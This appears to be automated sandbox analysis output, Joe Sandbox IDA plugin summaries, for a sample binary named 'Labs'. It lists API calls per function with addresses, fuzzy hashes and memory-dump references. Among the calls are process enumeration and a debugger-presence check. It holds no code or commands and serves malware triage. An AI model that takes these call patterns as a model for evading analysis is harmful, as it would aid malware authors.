                                                    • Opcode Fuzzy Hash: 5ed034ddc7cb086f6dec84a1b163ac98876e346c823c16a0f7de95d1df540e3f
                                                    • Instruction Fuzzy Hash: 4F316FB0605B01DFD765EF24D8C4697BBE8FB48308F004E2EF99A86250E775A944CB92
                                                    APIs
                                                    • __FF_MSGBANNER.LIBCMT ref: 00795953
                                                      • Part of subcall function 0079A39B: __NMSG_WRITE.LIBCMT ref: 0079A3C2
                                                      • Part of subcall function 0079A39B: __NMSG_WRITE.LIBCMT ref: 0079A3CC
                                                    • __NMSG_WRITE.LIBCMT ref: 0079595A
                                                      • Part of subcall function 0079A3F8: GetModuleFileNameW.KERNEL32(00000000,008353BA,00000104,00000004,00000001,00791003), ref: 0079A48A
                                                      • Part of subcall function 0079A3F8: ___crtMessageBoxW.LIBCMT ref: 0079A538
                                                      • Part of subcall function 007932CF: ___crtCorExitProcess.LIBCMT ref: 007932D5
                                                      • Part of subcall function 007932CF: ExitProcess.KERNEL32 ref: 007932DE
                                                      • Part of subcall function 00798D58: __getptd_noexit.LIBCMT ref: 00798D58
                                                    • RtlAllocateHeap.NTDLL(011F0000,00000000,00000001,?,00000004,?,?,00791003,?), ref: 0079597F
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1372826849-0
                                                    • Opcode ID: 0f7dc7c9576f18ec40ca0ca2002d446fe0bfb89d6f6c356b64b0fbadcca72618
                                                    • Instruction ID: 9f3462843a1c049bc066d6b7564ad34eb66c745e715640f0ba430b5301a4a7c4
                                                    • Opcode Fuzzy Hash: 0f7dc7c9576f18ec40ca0ca2002d446fe0bfb89d6f6c356b64b0fbadcca72618
                                                    • Instruction Fuzzy Hash: 6B01B531341B22EAFE122B34BC46B2E33589F96770F510526F4199B2D1DE7CAD004761
                                                    APIs
                                                    • InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 007E2970
                                                    • _memset.LIBCMT ref: 007E298B
                                                    • InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 007E299B
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: InternetOptionQuery$_memset
                                                    • String ID:
                                                    • API String ID: 3210845847-0
                                                    • Opcode ID: c390a93bda1b2ea579a0094e073af14956e820f6967aaae69dcf10b2d42dfd3b
                                                    • Instruction ID: 20adc0e6f79188235b4590487e649dcb60c05762529224d5b79ea6c83a17e8c5
                                                    • Opcode Fuzzy Hash: c390a93bda1b2ea579a0094e073af14956e820f6967aaae69dcf10b2d42dfd3b
                                                    • Instruction Fuzzy Hash: 2BF0AF71406218BFEB209F51EC85CEF3B5DEF083D0F448025F8085A142D63AAE91CAE4
                                                    APIs
                                                    • _free.LIBCMT ref: 007D92D6
                                                      • Part of subcall function 00792F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00799C54,00000000,00798D5D,007959C3), ref: 00792F99
                                                      • Part of subcall function 00792F85: GetLastError.KERNEL32(00000000,?,00799C54,00000000,00798D5D,007959C3), ref: 00792FAB
                                                    • _free.LIBCMT ref: 007D92E7
                                                    • _free.LIBCMT ref: 007D92F9
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                    • Instruction ID: df60bc8030d465a8eb60c729a0ae9799c68891edfbeaab5178e83e1983b4a1fc
                                                    • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                    • Instruction Fuzzy Hash: C1E012A1705602A7CE24B5797984E9377FC5F88751715051EB50AE7643DE2CF8428168
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CALL
                                                    • API String ID: 0-4196123274
                                                    • Opcode ID: 3d1a6dee672a5809688c46c59e2bb6bd59ac93ca456b33e1842c459ebd0de2c6
                                                    • Instruction ID: 18168726d87f629e8dee4a863af773d18e1d39775392d4fae118c8c4a0c46381
                                                    • Opcode Fuzzy Hash: 3d1a6dee672a5809688c46c59e2bb6bd59ac93ca456b33e1842c459ebd0de2c6
                                                    • Instruction Fuzzy Hash: 0D325770608741DFCB24DF14C494A2ABBE1BF85384F14C96DE88A9B366D779EC45CB82
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: EA06
                                                    • API String ID: 4104443479-3962188686
                                                    • Opcode ID: 38e99e5cd34064172b83fc90695c211a7330ae80a09a31b85c5ca24a93ed93be
                                                    • Instruction ID: 57c9bdcdb0a16cebfde73c4b34fd8a37e48b1bbf6d9baa61e47d50dc364ccf9e
                                                    • Opcode Fuzzy Hash: 38e99e5cd34064172b83fc90695c211a7330ae80a09a31b85c5ca24a93ed93be
                                                    • Instruction Fuzzy Hash: CD41A032A44159EBDF31AB5488557BF7FA59F45300F588079E8C1EB286D6AC9D8083E2
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 007D614E
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower
                                                    • String ID:
                                                    • API String ID: 2358735015-0
                                                    • Opcode ID: f7187dee92b236276325e04685f6a11783c86128200f260348c0750ac4c3c76f
                                                    • Instruction ID: 0c348dee56184e235160d85e487d8fd578ef6a04d296e4df1cd9b00c309764c8
                                                    • Opcode Fuzzy Hash: f7187dee92b236276325e04685f6a11783c86128200f260348c0750ac4c3c76f
                                                    • Instruction Fuzzy Hash: 7D41B4B6600209EFDB21EFA8C8819AEB7B9FB44350B10452FE55697341EB389E45CB50
                                                    APIs
                                                    • FindCloseChangeNotification.KERNEL32 ref: 00790ED5
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00790EE7
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseCreateFindNotificationSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 4162189087-0
                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction ID: ef3d6b4960996536f0d07e7bad0402ac624b6314dbb6f99fe93a4306aea7e510
                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction Fuzzy Hash: 3A31C371A10109DFDB18EF58E484969F7A6FF59300B648AA5E40ACB351EB35EEC1CBC0
                                                    APIs
                                                    • IsThemeActive.UXTHEME ref: 00785FEF
                                                      • Part of subcall function 0079359C: __lock.LIBCMT ref: 007935A2
                                                      • Part of subcall function 0079359C: DecodePointer.KERNEL32(00000001,?,00786004,007C8892), ref: 007935AE
                                                      • Part of subcall function 0079359C: EncodePointer.KERNEL32(?,?,00786004,007C8892), ref: 007935B9
                                                      • Part of subcall function 00785F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00785F18
                                                      • Part of subcall function 00785F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00785F2D
                                                      • Part of subcall function 00785240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0078526C
                                                      • Part of subcall function 00785240: IsDebuggerPresent.KERNEL32 ref: 0078527E
                                                      • Part of subcall function 00785240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 007852E6
                                                      • Part of subcall function 00785240: SetCurrentDirectoryW.KERNEL32(?), ref: 00785366
                                                    • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0078602F
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                    • String ID:
                                                    • API String ID: 1438897964-0
                                                    • Opcode ID: 9fcb2305502223eed009e0cab26ff6b800c5842ec52e94879fff9f8740b57ebd
                                                    • Instruction ID: 6a17aa5638acaefe13f3eec59cf7bd6b387991bf4d4689edc7af93c08ee91586
                                                    • Opcode Fuzzy Hash: 9fcb2305502223eed009e0cab26ff6b800c5842ec52e94879fff9f8740b57ebd
                                                    • Instruction Fuzzy Hash: 1F1159B1908345DBC720EF69EC4990ABBE8FFD8750F00891EF585872B2DB749544CB96
                                                    APIs
                                                      • Part of subcall function 0079593C: __FF_MSGBANNER.LIBCMT ref: 00795953
                                                      • Part of subcall function 0079593C: __NMSG_WRITE.LIBCMT ref: 0079595A
                                                      • Part of subcall function 0079593C: RtlAllocateHeap.NTDLL(011F0000,00000000,00000001,?,00000004,?,?,00791003,?), ref: 0079597F
                                                    • std::exception::exception.LIBCMT ref: 0079101C
                                                    • __CxxThrowException@8.LIBCMT ref: 00791031
                                                      • Part of subcall function 007987CB: RaiseException.KERNEL32(?,?,?,0082CAF8,?,?,?,?,?,00791036,?,0082CAF8,?,00000001), ref: 00798820
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 3902256705-0
                                                    • Opcode ID: 196ecb02ebcbea1706d18689734c8dab25ac61d022053d8b31e4b1f83e059f7f
                                                    • Instruction ID: d678c6ed0a0316b4e6656a728fc1d81cbd68ed49e4dc1794b83d2eab7e8afa1e
                                                    • Opcode Fuzzy Hash: 196ecb02ebcbea1706d18689734c8dab25ac61d022053d8b31e4b1f83e059f7f
                                                    • Instruction Fuzzy Hash: 64F0813550421EE6CF20AA98FC1A99E7BACAF01310F500459FD24D6291DFB99B94C2E1
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: __lock_file_memset
                                                    • String ID:
                                                    • API String ID: 26237723-0
                                                    • Opcode ID: d219f870801d0d3109a5f858ef666f8e509b6ca2c164f6514409aa45397a0ae9
                                                    • Instruction ID: b25c45233f5866a10596686c84d98fb41be484de8e562d638a162cf1d7acbd6f
                                                    • Opcode Fuzzy Hash: d219f870801d0d3109a5f858ef666f8e509b6ca2c164f6514409aa45397a0ae9
                                                    • Instruction Fuzzy Hash: AA018471801A18EBCF12AF69FC09C9E7B61AF81760F184216F8245A1A1D7398A21DF91
                                                    APIs
                                                      • Part of subcall function 00798D58: __getptd_noexit.LIBCMT ref: 00798D58
                                                    • __lock_file.LIBCMT ref: 0079560B
                                                      • Part of subcall function 00796E3E: __lock.LIBCMT ref: 00796E61
                                                    • __fclose_nolock.LIBCMT ref: 00795616
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                    • String ID:
                                                    • API String ID: 2800547568-0
                                                    • Opcode ID: 21630cf09e124bb6c2c50934fe699539c94fc073d865b081df6d238e2dee38fe
                                                    • Instruction ID: be898261e7ecbb440ca7b68b90343d5f657d0ca01070da3130e6abaa730c4770
                                                    • Opcode Fuzzy Hash: 21630cf09e124bb6c2c50934fe699539c94fc073d865b081df6d238e2dee38fe
                                                    • Instruction Fuzzy Hash: EEF0B471901B25DADF527B79B80AB6E77A26F41730F168209F824AB1C2CB7C4A419F52
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 00795EB4
                                                    • __ftell_nolock.LIBCMT ref: 00795EBF
                                                      • Part of subcall function 00798D58: __getptd_noexit.LIBCMT ref: 00798D58
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2999321469-0
                                                    • Opcode ID: d073b907152be0ef83920f02361e67b3b659c50961dcef9ddb0083fcf0d7e5cf
                                                    • Instruction ID: abbe48f266128d07d0976ffe789939bf475f191d7b64b04898c8bfa913e99399
                                                    • Opcode Fuzzy Hash: d073b907152be0ef83920f02361e67b3b659c50961dcef9ddb0083fcf0d7e5cf
                                                    • Instruction Fuzzy Hash: D6F0A771911625DADF41BB74A80B75E76906F02331F254307B424EF1C2CF7C4A419B56
                                                    APIs
                                                    • _memset.LIBCMT ref: 00785AEF
                                                    • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00785B1F
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell__memset
                                                    • String ID:
                                                    • API String ID: 928536360-0
                                                    • Opcode ID: cfdab443a1912d62fe5af922a9683b0acbab904fb9e895b48b170b3e65c03aed
                                                    • Instruction ID: be90293254a7d2af330554e219f162d4de28543c40f2f41ad0324293daa26d2f
                                                    • Opcode Fuzzy Hash: cfdab443a1912d62fe5af922a9683b0acbab904fb9e895b48b170b3e65c03aed
                                                    • Instruction Fuzzy Hash: 91F0A7B08083089FE7A2DB64DC497967BBCA70030CF0001E9AA4996292DB754B88CF55
                                                    APIs
                                                    • ___crtCorExitProcess.LIBCMT ref: 007932D5
                                                      • Part of subcall function 0079329B: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,007932DA,00791003,?,00799EEE,000000FF,0000001E,0082CE28,00000008,00799E52,00791003,00791003), ref: 007932AA
                                                      • Part of subcall function 0079329B: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 007932BC
                                                    • ExitProcess.KERNEL32 ref: 007932DE
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                    • String ID:
                                                    • API String ID: 2427264223-0
                                                    • Opcode ID: 8a2a7a7ac09da2bb4bbbe45fc484771bc273c51dd72154e6352cc79afa523424
                                                    • Instruction ID: 18d17d8a4836c561b13edae09330f804915dba325f659df55308dc229c7391d3
                                                    • Opcode Fuzzy Hash: 8a2a7a7ac09da2bb4bbbe45fc484771bc273c51dd72154e6352cc79afa523424
                                                    • Instruction Fuzzy Hash: 25B09230000208BBCF422F11EC0E8487F69FB00A90B008020F80408131DF72AA929A80
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: LoadString$__swprintf
                                                    • String ID:
                                                    • API String ID: 207118244-0
                                                    • Opcode ID: 3e44bb3b1d2cc6c24dc35030e7b5e1729bc8ed23ddc0166106abb9453c1e48f7
                                                    • Instruction ID: aedd52b19fa8d92a019576a2491c72e232eb3c6bdb0e47725fee543169f72d2a
                                                    • Opcode Fuzzy Hash: 3e44bb3b1d2cc6c24dc35030e7b5e1729bc8ed23ddc0166106abb9453c1e48f7
                                                    • Instruction Fuzzy Hash: 55B19F34A0114ADFCF15EF99C885DEEBBB5FF48710F20801AF915A7291EB34A952CB90
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 46fb8d349e8bd5aa5ca793a3ec8ad337f7e93736dc869547996377e132eb7964
                                                    • Instruction ID: d17a173b5ec072b4ca1c4f49edbda41a0077fc87aa554ad5cc1466888a9670d5
                                                    • Opcode Fuzzy Hash: 46fb8d349e8bd5aa5ca793a3ec8ad337f7e93736dc869547996377e132eb7964
                                                    • Instruction Fuzzy Hash: 3A31A075644A02DFC724EF1DD494A31F7A0FF09B10714C56DE98A8B7A1D734E991CB90
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: ac86c61d7e78404cd6e40e40a489cbe3d99071e700c2e0ff404186cf55c81581
                                                    • Instruction ID: bc24208a3791647837c7237376f47020b0b91c26a2d02693d31cd53b5cc84f88
                                                    • Opcode Fuzzy Hash: ac86c61d7e78404cd6e40e40a489cbe3d99071e700c2e0ff404186cf55c81581
                                                    • Instruction Fuzzy Hash: F0412C74504741DFDB14DF14C498B1ABBE1BF85348F1989ACE4899B362C37AEC45CB52
                                                    APIs
                                                      • Part of subcall function 00784B29: FreeLibrary.KERNEL32(00000000,?), ref: 00784B63
                                                      • Part of subcall function 0079547B: __wfsopen.LIBCMT ref: 00795486
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,007827AF,?,00000001), ref: 007849F4
                                                      • Part of subcall function 00784ADE: FreeLibrary.KERNEL32(00000000), ref: 00784B18
                                                      • Part of subcall function 007848B0: _memmove.LIBCMT ref: 007848FA
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
